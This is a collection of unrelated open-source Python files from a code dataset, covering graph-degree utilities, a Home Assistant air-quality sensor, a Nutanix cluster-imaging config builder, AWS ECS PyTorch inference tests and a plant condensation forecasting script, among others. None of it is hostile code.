G : NetworkX graph
An undirected graph.
Returns
-------
int
The number of nodes in the graph with degree equal to the maximum
degree.
See Also
--------
number_of_nodes_of_degree_k, number_of_leaves, number_of_min_degree_nodes,
max_degree
Examples
--------
>>> G = nx.path_graph(3) # Path on 3 nodes
>>> nx.number_of_max_degree_nodes(G)
1
"""
return number_of_nodes_of_degree_k(G, max_degree(G))
def neighborhood_degree_list(G, nbunch):
"""Return a list of the unique degrees of all neighbors of nodes in
`nbunch`.
Parameters
----------
G : NetworkX graph
An undirected graph.
nbunch :
A single node or iterable container of nodes.
Returns
-------
list
A list of the degrees of all nodes in the neighborhood of the nodes
in `nbunch`.
See Also
--------
closed_neighborhood_degree_list, neighborhood
Examples
--------
>>> import grinpy as gp
>>> G = gp.path_graph(3) # Path on 3 nodes
>>> gp.neighborhood_degree_list(G, 1)
[1, 2]
"""
if isinstance(nodes, collections.abc.Iterable):
return list(set(degree(G, u) for u in set_neighborhood(G, nbunch)))
else:
return list(set(degree(G, u) for u in neighborhood(G, nbunch)))
def closed_neighborhood_degree_list(G, nbunch):
"""Return a list of the unique degrees of all nodes in the closed
neighborhood of the nodes in `nbunch`.
Parameters
----------
G : NetworkX graph
An undirected graph.
nbunch :
A single node or iterable container of nodes.
Returns
-------
list
A list of the degrees of all nodes in the closed neighborhood of the
nodes in `nbunch`.
See Also
--------
closed_neighborhood, neighborhood_degree_list
Examples
--------
>>> import grinpy as gp
>>> G = gp.path_graph(3) # Path on 3 nodes
>>> gp.closed_neighborhood_degree_list(G, 1)
[1, 2, 2]
"""
if isinstance(nodes, collections.abc.Iterable):
return list(set(degree(G, u) for u in set_closed_neighborhood(G, nbunch)))
else:
return list(set(degree(G, u) for u in closed_neighborhood(G, nbunch)))
def is_regular(G):
""" Return True if G is regular, and False otherwise.
A graph is *regular* if each node has the same degree.
Parameters
----------
G : NetworkX graph
An undirected graph
Returns
-------
boolean
True if regular, false otherwise.
"""
return min_degree(G) == max_degree(G)
def is_k_regular(G, k):
""" Return True if the graph is regular of degree k and False otherwise.
A graph is *regular of degree k* if all nodes have degree equal to *k*.
Parameters
----------
G : NetworkX graph
An undirected graph
k : int
An integer
Returns
-------
boolean
True if all nodes have degree equal to *k*, False otherwise.
"""
# check that k is an integer
if not float(k).is_integer():
raise TypeError("Expected k to be an integer.")
k = int(k)
for v in nodes(G):
if not degree(G, v) == k:
return False
return True
def is_sub_cubic(G):
""" Return True if *G* sub-cubic, and False otherwise.
A graph is *sub-cubic* if its maximum degree is at most 3.
Parameters
----------
G : NetworkX graph
An undirected graph.
Returns
-------
boolean
True if *G* is sub-cubic, False otherwise.
"""
return max_degree(G) <= 3
def is_cubic(G):
""" Return True if *G* is cubic, and False otherwise.
A graph is *cubic* if it is regular of degree 3.
Parameters
----------
G : NetworkX graph
An undirected graph
Returns
-------
boolean
True if *G* is cubic, False otherwise.
"""
return is_k_regular(G, 3)
| StarcoderdataPython |
6607764 | <reponame>timotheuslin/pyedid<filename>pyedid/main.py
"""
Entrypoint
"""
import sys
from pyedid.edid import Edid
from pyedid.helpers.edid_helper import EdidHelper
from pyedid.helpers.registry import Registry
def main():
"""Main func"""
xrandr_file = '' if len(sys.argv) == 1 else sys.argv[1]
if xrandr_file in {'-?', '-h', '--help'}:
print("Usage: pyedid [xrandr_file]")
sys.exit(0)
print("Loading registry from web...")
registry = Registry.from_web()
print("Done!\n")
for raw in EdidHelper.get_edids(xrandr_file):
edid = Edid(raw, registry)
print(edid)
if __name__ == "__main__":
main()
| StarcoderdataPython |
3489111 | from core.actions.base import Action
from core.actions.baseresolution import ActionResolution
class ActionStack(object):
"""
An action stack keeping track of the action resolutions of a game object.
"""
__slots__ = ["game", "game_object", "action_resolutions", "update_turn_callback"]
def __init__(self, game, game_object, update_turn_callback=None):
"""
:param game_object: The executor game object
:param update_turn_callback: The callback, if any, to update to next turn.
"""
self.game = game
self.game_object = game_object
self.action_resolutions = []
self.update_turn_callback = update_turn_callback
def add_action_to_stack(self, action):
"""
This will add an action to the stack if it needs resolution
or execute it straight away if it doesn't.
:param action: The action to be executed.
:type action: Action
"""
if not action.can_select(self.game_object):
return
if action.target_selection is not None:
self.action_resolutions.append(
ActionResolution(action, self.game_object, action.target_selection.copy(), self.game))
else:
self._start_action(ActionResolution(action, self.game_object, None, self.game))
self.update_turn_callback()
def update(self):
"""
This will update the resolution on the top of the stack.
Once the selections and filters are resolved it executes an action.
"""
if not self.action_resolutions:
return
current_resolution = self.action_resolutions[-1]
current_resolution.update()
if current_resolution.finished:
self._start_action(current_resolution)
self.action_resolutions.remove(current_resolution)
if not self.action_resolutions:
self.update_turn_callback()
@staticmethod
def _start_action(action_resolution):
"""
Executes an action using the resolved targets.
:param action_resolution: The ActionResolution to execute.
:type action_resolution: ActionResolution
"""
if action_resolution.can_execute_action():
action_resolution.execute_action()
| StarcoderdataPython |
262873 | # zmq push example. Run the zmq_puller.py program for the client
import curio_zmq as zmq
async def pusher(address):
ctx = zmq.Context()
sock = ctx.socket(zmq.PUSH)
sock.bind(address)
for n in range(100):
await sock.send(b'Message %d' % n)
await sock.send(b'exit')
if __name__ == '__main__':
zmq.run(pusher, 'tcp://*:9000')
| StarcoderdataPython |
4945400 | <reponame>vtashev/local_luftdaten
"""
Support for Luftdaten sensors.
Copyright (c) 2019 <NAME>
Licensed under MIT. All rights reserved.
https://github.com/lichtteil/local_luftdaten/
"""
import logging
import asyncio
import json
from datetime import timedelta
import requests
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_NAME, CONF_RESOURCE, CONF_VERIFY_SSL, CONF_MONITORED_CONDITIONS,
TEMP_CELSIUS)
from homeassistant.helpers.entity import Entity
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
VOLUME_MICROGRAMS_PER_CUBIC_METER = 'µg/m3'
SENSOR_TEMPERATURE = 'BME280_temperature'
SENSOR_HUMIDITY = 'BME280_humidity'
SENSOR_PM1 = 'SDS_P1'
SENSOR_PM2 = 'SDS_P2'
SENSOR_TYPES = {
SENSOR_TEMPERATURE: ['Temperature', TEMP_CELSIUS],
SENSOR_HUMIDITY: ['Humidity', '%'],
SENSOR_PM1: ['PM10', VOLUME_MICROGRAMS_PER_CUBIC_METER],
SENSOR_PM2: ['PM2.5', VOLUME_MICROGRAMS_PER_CUBIC_METER]
}
DEFAULT_NAME = 'Luftdaten Sensor'
DEFAULT_RESOURCE = 'http://{}/data.json'
DEFAULT_VERIFY_SSL = True
CONF_HOST = 'host'
SCAN_INTERVAL = timedelta(minutes=3)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_MONITORED_CONDITIONS):
vol.All(cv.ensure_list, [vol.In(SENSOR_TYPES)]),
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_RESOURCE, default=DEFAULT_RESOURCE): cv.string,
vol.Optional(CONF_VERIFY_SSL, default=DEFAULT_VERIFY_SSL): cv.boolean
})
@asyncio.coroutine
def async_setup_platform(hass, config, async_add_devices, discovery_info=None):
"""Set up the Luftdaten sensor."""
name = config.get(CONF_NAME)
host = config.get(CONF_HOST)
verify_ssl = config.get(CONF_VERIFY_SSL)
resource = config.get(CONF_RESOURCE).format(host)
rest_client = LuftdatenData(resource, verify_ssl)
rest_client.update()
if rest_client.data is None:
_LOGGER.error("Unable to fetch Luftdaten data")
return False
devices = []
for variable in config[CONF_MONITORED_CONDITIONS]:
devices.append(LuftdatenSensor(rest_client, name, variable))
async_add_devices(devices, True)
class LuftdatenSensor(Entity):
"""Implementation of a LuftdatenSensor sensor."""
def __init__(self, rest_client, name, sensor_type):
"""Initialize the LuftdatenSensor sensor."""
self.rest_client = rest_client
self._name = name
self._state = None
self.sensor_type = sensor_type
self._unit_of_measurement = SENSOR_TYPES[sensor_type][1]
@property
def name(self):
"""Return the name of the sensor."""
return '{} {}'.format(self._name, SENSOR_TYPES[self.sensor_type][0])
@property
def state(self):
"""Return the state of the device."""
return self._state
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this entity, if any."""
return self._unit_of_measurement
def update(self):
"""Get the latest data from REST API and update the state."""
self.rest_client.update()
value = self.rest_client.data
try:
parsed_json = json.loads(value)
if not isinstance(parsed_json, dict):
_LOGGER.warning("JSON result was not a dictionary")
return
except ValueError:
_LOGGER.warning("REST result could not be parsed as JSON")
_LOGGER.debug("Erroneous JSON: %s", value)
return
if value is not None:
parsed_json = json.loads(value)
sensordata_values = parsed_json['sensordatavalues']
for sensordata_value in sensordata_values:
if sensordata_value['value_type'] == self.sensor_type:
self._state = sensordata_value['value']
else:
_LOGGER.warning("Empty reply found when expecting JSON data")
class LuftdatenData(object):
"""Class for handling the data retrieval."""
def __init__(self, resource, verify_ssl):
"""Initialize the data object."""
self._request = requests.Request('GET', resource).prepare()
self._verify_ssl = verify_ssl
self.data = None
def update(self):
"""Get the latest data from Luftdaten service."""
try:
with requests.Session() as sess:
response = sess.send(
self._request, timeout=10, verify=self._verify_ssl)
self.data = response.text
except requests.exceptions.RequestException:
_LOGGER.error("Error fetching data: %s", self._request)
self.data = None | StarcoderdataPython |
11376611 | from pycat.base.event import KeyCode, KeyEvent, MouseEvent
from pycat.sound import AudioLoop, Player
from pycat.core import Sprite, Window
window = Window(title="Sound Test")
class MusicalSprite1(Sprite):
def setup(self, x: float, sound: Player):
self.position = (x, 0.33 * window.height)
self.sound = sound
self.image = "img/boom.png"
self.scale = 0.2
def on_left_click(self):
self.sound.play()
class MusicalSprite2(Sprite):
def setup(self, x: float, player: Player):
self.position = (x, 0.66 * window.height)
self.player = player
self.image = "img/eye.png"
self.scale = 0.5
window.add_event_subscriber(self)
def on_mouse_press(self, e: MouseEvent):
if self.contains_point(e.position):
self.player.play()
sound_file = [
"audio/not_working_on_mac/bonk.m4a",
"audio/hit.wav",
"audio/point.wav",
"audio/swoosh.wav",
"audio/wing.wav"
]
dx = window.width / (len(sound_file) + 1)
for i, file in enumerate(sound_file):
x = dx * (i + 1)
s1: MusicalSprite1 = window.create_sprite(MusicalSprite1)
s1.setup(x, Player(file))
s2 = window.create_sprite(MusicalSprite2)
s2.setup(x, Player(file, volume=1, pitch=0.5))
background_player = AudioLoop("audio/LoopLivi.wav")
background_player.play()
def on_key_press(key: KeyEvent):
if key == '1':
file = "audio/LoopLivi.wav"
background_player.set_audio(file, play=True)
elif key == '2':
file = "audio/LoopSakamoto.wav"
background_player.set_audio(file, play=True)
elif key == '3':
file = "audio/not_working_on_mac/Space Ambience.m4a"
background_player.set_audio(file, play=True)
elif key == KeyCode.UP:
background_player.volume += .1
elif key == KeyCode.DOWN:
background_player.volume -= .1
elif key == KeyCode.RIGHT:
background_player.pitch += .01
elif key == KeyCode.LEFT:
background_player.pitch -= .01
elif key == KeyCode.SPACE:
if background_player.is_playing:
background_player.pause()
else:
background_player.play()
window.set_clear_color(175, 173, 213)
window.run(on_key_press=on_key_press)
| StarcoderdataPython |
11370339 | # coding=utf-8
"""
@Time : 2020/12/26 13:04
@Author : <NAME> (github.com/VincentGaoHJ)
@Email : <EMAIL> <EMAIL>
@Sketch :
"""
from src.graphviz.textrank import textrank
from src.graphviz.postprune import postPrune
from src.graphviz.generate import generatetxt
from src.graphviz.preprocess import graphv_prep
from src.graphviz.graphviz import graphviz
if __name__ == '__main__':
# 设置要可视化的源文件夹
visual_dir = "2019-06-08-18-45-01"
textrank(visual_dir) # 对每一个节点生成 text rank 的结果并保存
graphv_prep(visual_dir) # 将原始数据文件中有用的结果文件移动到可视化文件夹中
postPrune(visual_dir) # 对结果进行后剪枝,并且保存后剪枝结果
generatetxt(visual_dir) # 将后剪枝前后的结果生成绘图准备文件
graphviz(visual_dir) # 利用 graphviz 绘图
| StarcoderdataPython |
1603805 | <filename>example/build_config.py<gh_stars>0
# Copyright (c) 2020 Nutanix Inc. All rights reserved.
#
# Author: <EMAIL>
import os
import json
from foundation_node import FoundationNode
config_dict = {}
def get_node_config():
fp = open('node_config.json', "r")
node_config = fp.read()
fp.close()
node_config = json.loads(node_config)
return node_config
def get_fvm():
fp = open('fvm_pool.json', "r")
fvm = fp.read()
fp.close()
fvm = json.loads(fvm)
return fvm.get("foundation_ip")[0]
def get_nodes_metadata(node_config):
nodes_metadata = []
for i in range(len(node_config["node_name"].split(","))):
node = "curl -k https://jarvis.eng.nutanix.com/api/v1/nodes/" + node_config["node_name"].split(",")[i]
node_data = os.system(node + ' > node_data.txt')
if os.path.exists('node_data.txt'):
fp = open('node_data.txt', "r")
output = fp.read()
output = json.loads(output)
nodes_metadata.append(output)
fp.close()
os.remove('node_data.txt')
return nodes_metadata
def setup_block_and_node_information(nodes, cvm_memory=12):
blocks_config = {}
node = None
for node in nodes:
block_id = node.block_id
if block_id not in blocks_config:
blocks_config[node.block_id] = {}
blocks_config[node.block_id]["block_id"] = node.block_id
blocks_config[node.block_id]["nodes"] = []
block_config = blocks_config[node.block_id]
nodes_config = block_config["nodes"]
node_config = {
"image_now": node.image_now,
"ipmi_ip": node.ipmi_ip,
"hypervisor_ip": node.host_ip,
"hypervisor": node.hypervisor_type,
"ipmi_mac": node.ipmi_mac,
"ipmi_password": node.ipmi_password,
"ipmi_user": node.ipmi_user,
"node_position": node.position,
"node_serial": node.serial,
"cvm_ip": node.cvm_ip,
"hypervisor_hostname": node.hostname,
"cvm_gb_ram": cvm_memory
}
nodes_config.append(node_config)
blocks = blocks_config.values()
config_dict.update({
"blocks": blocks,
"clusters": [],
"hypervisor_netmask": nodes[0].netmask,
"hypervisor_gateway": nodes[0].gateway,
"ipmi_user": nodes[0].ipmi_user,
"ipmi_password": nodes[0].ipmi_password,
"ipmi_gateway": nodes[0].ipmi_gateway,
"ipmi_netmask": nodes[0].ipmi_netmask,
"cvm_netmask": nodes[0].netmask,
"cvm_gateway": nodes[0].gateway
})
def setup_cluster_creation(cluster_members, cluster_name, redundancy_factor=2,
cvm_ntp="", cvm_dns="",hypervisor_ntp_servers="", timezone="Africa/Addis_Ababa"):
"""
Args:
cluster_init(bool): True or False
redundancy_factor(int): Redundancy Factor for a cluster - 2 or 3
cvm_ntp(str): IP address for CVM NTP
cvm_dns(str): IP address for CVM DNS
hypervisor_ntp_servers(str): IP address for Hypervisor NTP
timezone(str): Timezone to be configured on CVM
Returns:
None
"""
clusters_to_create = []
cluster_config = {"cluster_name":cluster_name ,
"redundancy_factor": redundancy_factor,
"cluster_members": cluster_members,
"cluster_init_now": True,
"cluster_external_ip": None,
"cluster_init_successful": None,
"timezone": timezone,
"cvm_ntp_servers": cvm_ntp,
"cvm_dns_servers": cvm_dns}
clusters_to_create.append(cluster_config)
config_dict.update({"clusters": clusters_to_create,
"hypervisor_ntp_servers": hypervisor_ntp_servers})
def setup_nos_hyp(nos_name, hyp_iso):
"""
setup NOS and hypervisir
"""
config_dict["nos_package"] = nos_name
config_dict["hypervisor_iso"] = {}
def setup_hypervisor_type(hypervisor_type):
"""
Args:
hypervisor_type (str): esx, kvm etc
Returns:
None
"""
for block in config_dict["blocks"]:
for node in block["nodes"]:
if not node["hypervisor"]:
node["hypervisor"] = hypervisor_type
fvm = get_fvm()
node_config = get_node_config()
node_name = node_config["node_name"]
nodes_metadata = get_nodes_metadata(node_config)
nodes = [FoundationNode(metadata = node_data) for node_data in nodes_metadata]
setup_block_and_node_information(nodes)
cluster_members = [config_dict["blocks"][0]["nodes"][i]["cvm_ip"] for i in range(len(config_dict["blocks"][0]["nodes"]))]
cluster_name = node_config.get("cluster_name", node_config.get("node_name").split(",")[0])
setup_cluster_creation(cluster_members=cluster_members, cluster_name=cluster_name)
nos_name = node_config.get("nos_name")
setup_nos_hyp(nos_name=nos_name, hyp_iso="")
setup_hypervisor_type(node_config.get("hypervisor","kvm"))
config_dict = json.dumps(config_dict)
image_nodes_curl = 'curl -X POST --header "Content-Type: application/json" --header "Accept: application/json" -d' \
+ json.dumps(config_dict) + ' "http://"' + fvm + '":8000/foundation/image_nodes"'
print image_nodes_curl
os.system(image_nodes_curl + ' > session_id.log')
| StarcoderdataPython |
9640778 | <reponame>cdagnino/ngboost
from .normal import Normal, NormalFixedVar
#from .laplace import Laplace, LaplaceFixedVar
from .lognormal import LogNormal
#from .loglaplace import LogLaplace
from .exponential import Exponential
from .bernoulli import Bernoulli
| StarcoderdataPython |
3597304 | <filename>dippy/core/models/reaction.py
from dippy.core.models.emoji import EmojiModel
from dippy.core.models.model import DippyCoreModel
class ReactionModel(DippyCoreModel):
count: int
me: bool
emoji: EmojiModel
| StarcoderdataPython |
245 | <filename>gen-cfg.py
from staticfg import CFGBuilder
userCfg = CFGBuilder().build_from_file('user.py', './auction/user.py')
bidCfg = CFGBuilder().build_from_file('bid.py', './auction/bid.py')
auctionCfg = CFGBuilder().build_from_file('auction.py','./auction/auction.py')
#auctionEventCfg = CFGBuilder().build_from_file('auction_event.py','./auction/auction_event.py')
bidCfg.build_visual('bidCfg', 'pdf')
auctionCfg.build_visual('auctionCfg', 'pdf')
#auctionEventCfg.build_visual('auctionEventCfg.pdf', 'pdf')
| StarcoderdataPython |
8170617 | <reponame>haohanchen-yagao/deep-learning-containers
import pytest
import test.test_utils.ecs as ecs_utils
import test.test_utils.ec2 as ec2_utils
from test.test_utils import request_pytorch_inference_densenet, get_framework_and_version_from_tag, get_inference_server_type
from test.test_utils import ECS_AML2_CPU_USWEST2, ECS_AML2_GPU_USWEST2, ECS_AML2_GRAVITON_CPU_USWEST2
@pytest.mark.model("densenet")
@pytest.mark.parametrize("ecs_instance_type", ["c5.4xlarge"], indirect=True)
@pytest.mark.parametrize("ecs_ami", [ECS_AML2_CPU_USWEST2], indirect=True)
def test_ecs_pytorch_inference_cpu(pytorch_inference, ecs_container_instance, region, cpu_only):
__ecs_pytorch_inference_cpu(pytorch_inference, ecs_container_instance, region)
@pytest.mark.model("densenet")
@pytest.mark.parametrize("ecs_instance_type", ["c6g.4xlarge"], indirect=True)
@pytest.mark.parametrize("ecs_ami", [ECS_AML2_GRAVITON_CPU_USWEST2], indirect=True)
def test_ecs_pytorch_inference_graviton_cpu(pytorch_inference, ecs_container_instance, region, graviton_only):
__ecs_pytorch_inference_cpu(pytorch_inference, ecs_container_instance, region)
def __ecs_pytorch_inference_cpu(pytorch_inference, ecs_container_instance, region):
worker_instance_id, ecs_cluster_arn = ecs_container_instance
public_ip_address = ec2_utils.get_public_ip(worker_instance_id, region=region)
model_name = "pytorch-densenet"
service_name = task_family = revision = None
try:
service_name, task_family, revision = ecs_utils.setup_ecs_inference_service(
pytorch_inference, "pytorch", ecs_cluster_arn, model_name, worker_instance_id, region=region
)
server_type = get_inference_server_type(pytorch_inference)
inference_result = request_pytorch_inference_densenet(public_ip_address, server_type=server_type)
assert inference_result, f"Failed to perform inference at IP address: {public_ip_address}"
finally:
ecs_utils.tear_down_ecs_inference_service(ecs_cluster_arn, service_name, task_family, revision)
@pytest.mark.integration("elastic_inference")
@pytest.mark.model("densenet")
@pytest.mark.parametrize("ecs_instance_type", ["c5.4xlarge"], indirect=True)
@pytest.mark.parametrize("ecs_ami", [ECS_AML2_CPU_USWEST2], indirect=True)
@pytest.mark.parametrize("ei_accelerator_type", ["eia1.large"], indirect=True)
def test_ecs_pytorch_inference_eia(
pytorch_inference_eia, ecs_container_instance, ei_accelerator_type, region, eia_only, pt14_and_above_only
):
worker_instance_id, ecs_cluster_arn = ecs_container_instance
public_ip_address = ec2_utils.get_public_ip(worker_instance_id, region=region)
model_name = "pytorch-densenet"
image_framework, image_framework_version = get_framework_and_version_from_tag(pytorch_inference_eia)
if image_framework_version == "1.3.1":
model_name = "pytorch-densenet-v1-3-1"
service_name = task_family = revision = None
try:
service_name, task_family, revision = ecs_utils.setup_ecs_inference_service(
pytorch_inference_eia, "pytorch", ecs_cluster_arn, model_name, worker_instance_id, ei_accelerator_type, region=region
)
server_type = get_inference_server_type(pytorch_inference_eia)
inference_result = request_pytorch_inference_densenet(public_ip_address, model_name=model_name, server_type=server_type)
assert inference_result, f"Failed to perform inference at IP address: {public_ip_address}"
finally:
ecs_utils.tear_down_ecs_inference_service(ecs_cluster_arn, service_name, task_family, revision)
@pytest.mark.model("densenet")
@pytest.mark.parametrize("ecs_instance_type", ["p3.8xlarge"], indirect=True)
@pytest.mark.parametrize("ecs_ami", [ECS_AML2_GPU_USWEST2], indirect=True)
def test_ecs_pytorch_inference_gpu(pytorch_inference, ecs_container_instance, region, gpu_only):
worker_instance_id, ecs_cluster_arn = ecs_container_instance
public_ip_address = ec2_utils.get_public_ip(worker_instance_id, region=region)
num_gpus = ec2_utils.get_instance_num_gpus(worker_instance_id, region=region)
model_name = "pytorch-densenet"
service_name = task_family = revision = None
try:
service_name, task_family, revision = ecs_utils.setup_ecs_inference_service(
pytorch_inference, "pytorch", ecs_cluster_arn, model_name, worker_instance_id, num_gpus=num_gpus,
region=region
)
server_type = get_inference_server_type(pytorch_inference)
inference_result = request_pytorch_inference_densenet(public_ip_address, server_type=server_type)
assert inference_result, f"Failed to perform inference at IP address: {public_ip_address}"
finally:
ecs_utils.tear_down_ecs_inference_service(ecs_cluster_arn, service_name, task_family, revision)
| StarcoderdataPython |
5147526 | <filename>predict_model.py
import os
import pickle
import numpy as np
import pandas as pd
from lightgbm.sklearn import LGBMRegressor, LGBMClassifier
import django
from django.conf import settings
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "raspberry.settings")
django.setup()
from monitor.models import PlantEnviron, WeatherForecast, Prediction
def dewpoint(temp, humid):
return ((243.12 *((17.62 * temp /(243.12 + temp)) + np.log(humid / 100.0)))
/ (17.62-((17.62 * temp / (243.12 + temp)) + np.log(humid/ 100.0))))
plant1 = PlantEnviron.objects.filter(plant='1')
plant2 = PlantEnviron.objects.filter(plant='2')
forecast = WeatherForecast.objects.all()
col = ['recTime', 'tem_in_loc1', 'hum_in_loc1', 'tem_coil_loc1', 'tem_in_loc2',
'hum_in_loc2', 'tem_coil_loc2', 'tem_in_loc3', 'hum_in_loc3', 'tem_coil_loc3',
'tem_out_loc1', 'hum_out_loc1', 'cond_loc1', 'cond_loc2', 'cond_loc3', ]
fc_col = ['fcTime', 'temp_25', 'temp_46', 'humid_25', 'humid_46', 'rain_25', 'rain_46', 'wind_25', 'wind_46']
df1 = pd.DataFrame(columns=col)
df2 = pd.DataFrame(columns=col)
fc = pd.DataFrame(columns=fc_col)
for obj in plant1[:31]:
data = pd.Series({'recTime':obj.recTime, 'tem_in_loc1':obj.tem_in_loc1, 'hum_in_loc1':obj.hum_in_loc1, 'tem_coil_loc1':obj.tem_coil_loc1,
'tem_in_loc2':obj.tem_in_loc2, 'hum_in_loc2':obj.hum_in_loc2, 'tem_coil_loc2':obj.tem_coil_loc2,
'tem_in_loc3':obj.tem_in_loc3, 'hum_in_loc3':obj.hum_in_loc3, 'tem_coil_loc3':obj.tem_coil_loc3,
'tem_out_loc1':obj.tem_out_loc1, 'hum_out_loc1':obj.hum_out_loc1,
'cond_loc1':obj.cond_loc1, 'cond_loc2':obj.cond_loc2, 'cond_loc3':obj.cond_loc3,})
df1 = df1.append(data, ignore_index=True)
df1.index = df1['recTime']
df1 = df1.drop('recTime', axis=1)
for obj in plant2[:31]:
data = pd.Series({'recTime':obj.recTime, 'tem_in_loc1':obj.tem_in_loc1, 'hum_in_loc1':obj.hum_in_loc1, 'tem_coil_loc1':obj.tem_coil_loc1,
'tem_in_loc2':obj.tem_in_loc2, 'hum_in_loc2':obj.hum_in_loc2, 'tem_coil_loc2':obj.tem_coil_loc2,
'tem_in_loc3':obj.tem_in_loc3, 'hum_in_loc3':obj.hum_in_loc3, 'tem_coil_loc3':obj.tem_coil_loc3,
'tem_out_loc1':obj.tem_out_loc1, 'hum_out_loc1':obj.hum_out_loc1,
'cond_loc1':obj.cond_loc1, 'cond_loc2':obj.cond_loc2, 'cond_loc3':obj.cond_loc3,})
df2 = df2.append(data, ignore_index=True)
df2.index = df2['recTime']
df2 = df2.drop('recTime', axis=1)
for obj in forecast:
data = pd.Series({'fcTime':obj.fcTime, 'temp_25':obj.temp_25, 'temp_46':obj.temp_46,
'humid_25':obj.humid_25, 'humid_46':obj.humid_46, 'rain_25':obj.rain_25, 'rain_46':obj.rain_46,
'wind_25':obj.wind_25, 'wind_46':obj.wind_46})
fc = fc.append(data, ignore_index=True)
fc.index = fc['fcTime']
fc = fc.drop('fcTime', axis=1)
data = pd.concat([df1,fc], axis=1)
data2 = pd.concat([df2,fc], axis=1)
# 1공장
# 보간
inp = data.loc[:, 'temp_25':'wind_46']
data.update(inp.interpolate())
tempTrain = data.dropna()
test = tempTrain.resample('1h').asfreq().dropna()
test_X = test.drop(['cond_loc1', 'cond_loc2', 'cond_loc3'], axis=1)
ma6 = test_X.rolling(6).mean().filter(regex='(25|46)').add_prefix('MA6_')
ma24 = test_X.rolling(24).mean().filter(regex='(25|46)').add_prefix('MA24_')
test_X = pd.concat([test_X, ma6, ma24], axis=1).dropna()
# 2공장
# 보간
inp = data2.loc[:, 'temp_25':'wind_46']
data2.update(inp.interpolate())
tempTrain2 = data2.dropna()
test2 = tempTrain2.resample('1h').asfreq().dropna()
test2_X = test2.drop(['cond_loc1', 'cond_loc2', 'cond_loc3'], axis=1)
ma6 = test2_X.rolling(6).mean().filter(regex='(25|46)').add_prefix('MA6_')
ma24 = test2_X.rolling(24).mean().filter(regex='(25|46)').add_prefix('MA24_')
test2_X = pd.concat([test2_X, ma6, ma24], axis=1).dropna()
# 모델 불러오기
with open('models/forecast_model.bin','rb') as f:
forecasters = pickle.load(f)
with open('models/scalers.bin','rb') as f:
scalers = pickle.load(f)
with open('models/classifiers.bin','rb') as f:
classifiers = pickle.load(f)
# plant1 predict
plant1_pred = pd.DataFrame()
for col in forecasters['1']:
preds = []
time_col = test_X.filter(regex= f'{col[1:3]}$').columns.to_list()
in_col = test_X.filter(regex=f'(in|coil)_loc{col[-1]}').columns.to_list()
out_col = test_X.filter(regex=f'out_loc1').columns.to_list()
if 'out_loc1' in col:
tcol = time_col + out_col
else:
tcol = time_col + in_col
x = test_X[tcol]
scaler = scalers['1'][col]
x.loc[:,:] = scaler.transform(x)
for model in forecasters['1'][col]:
preds.append(model.predict(x))
pred = np.mean(preds, axis=0)
plant1_pred[col] = pred
plant1_pred.index = test_X.index
# plant2 predict
plant2_pred = pd.DataFrame()
for col in forecasters['2']:
preds = []
time_col = test_X.filter(regex= f'{col[1:3]}$').columns.to_list()
in_col = test_X.filter(regex=f'(in|coil)_loc{col[-1]}').columns.to_list()
out_col = test_X.filter(regex=f'out_loc1').columns.to_list()
if 'out_loc1' in col:
tcol = time_col + out_col
else:
tcol = time_col + in_col
x = test_X[tcol]
scaler = scalers['2'][col]
x.loc[:,:] = scaler.transform(x)
for model in forecasters['2'][col]:
preds.append(model.predict(x))
pred = np.mean(preds, axis=0)
plant2_pred[col] = pred
plant2_pred.index = test_X.index
# 1공장 결로 예측 전처리
tem_col = plant1_pred.filter(regex='tem_in_').columns
hum_col = plant1_pred.filter(regex='hum_in_').columns
coil_col = plant1_pred.filter(regex='coil_').columns
for i in range(len(tem_col)):
dew_col = f'{tem_col[i][:3]}_dewpoint_{tem_col[i][-7:]}'
plant1_pred[dew_col] = dewpoint(plant1_pred[tem_col[i]], plant1_pred[hum_col[i]])
plant1_pred[f'{tem_col[i][:3]}_dewdiff_{tem_col[i][-7:]}'] = plant1_pred[coil_col[i]] - plant1_pred[dew_col]
plant1_pred['month'] = plant1_pred.index.month
plant1_pred['day'] = plant1_pred.index.day
plant1_pred['hour'] = plant1_pred.index.hour
# 2공장 결로 예측 전처리
tem_col = plant2_pred.filter(regex='tem_in_').columns
hum_col = plant2_pred.filter(regex='hum_in_').columns
coil_col = plant2_pred.filter(regex='coil_').columns
for i in range(len(tem_col)):
dew_col = f'{tem_col[i][:3]}_dewpoint_{tem_col[i][-7:]}'
plant2_pred[dew_col] = dewpoint(plant2_pred[tem_col[i]], plant2_pred[hum_col[i]])
plant2_pred[f'{tem_col[i][:3]}_dewdiff_{tem_col[i][-7:]}'] = plant2_pred[coil_col[i]] - plant2_pred[dew_col]
plant2_pred['month'] = plant2_pred.index.month
plant2_pred['day'] = plant2_pred.index.day
plant2_pred['hour'] = plant2_pred.index.hour
print(plant1_pred)
###################################################################################################
# 1공장 결로 예측
test_pred = {}
for time_label in ['y25', 'y46']:
X_time = plant1_pred.filter(regex=f'{time_label}')
for loc_label in ['loc1', 'loc2', 'loc3']:
print(f'pred : {loc_label}_{time_label}')
in_col = X_time.filter(regex=f'(in|coil)_{loc_label}').columns.to_list()
out_col = X_time.filter(regex=f'out_loc1').columns.to_list()
date_col = ['month','day', 'hour']
tcol = in_col + out_col + date_col
p = np.zeros(X_time.shape[0])
for m in classifiers['1'][f'{time_label}_{loc_label}']:
p += (m.predict_proba( plant1_pred[tcol] )/5)[:, 1].reshape(-1,)[0]
p_cond = np.where(p>0.3, 1, 0)
test_pred[f'{loc_label}_{time_label}'] = p_cond
print(test_pred)
# 2공장 결로 예측
test2_pred = {}
for time_label in ['y25', 'y46']:
X_time = plant2_pred.filter(regex=f'{time_label}')
for loc_label in ['loc1', 'loc2', 'loc3']:
print(f'pred : {loc_label}_{time_label}')
in_col = X_time.filter(regex=f'(in|coil)_{loc_label}').columns.to_list()
out_col = X_time.filter(regex=f'out_loc1').columns.to_list()
date_col = ['month','day', 'hour']
tcol = in_col + out_col + date_col
p = np.zeros(X_time.shape[0])
for m in classifiers['1'][f'{time_label}_{loc_label}']:
p += (m.predict_proba( plant2_pred[tcol] )/5)[:, 1].reshape(-1,)[0]
p_cond = np.where(p>0.3, 1, 0)
test2_pred[f'{loc_label}_{time_label}'] = p_cond
# #save env data
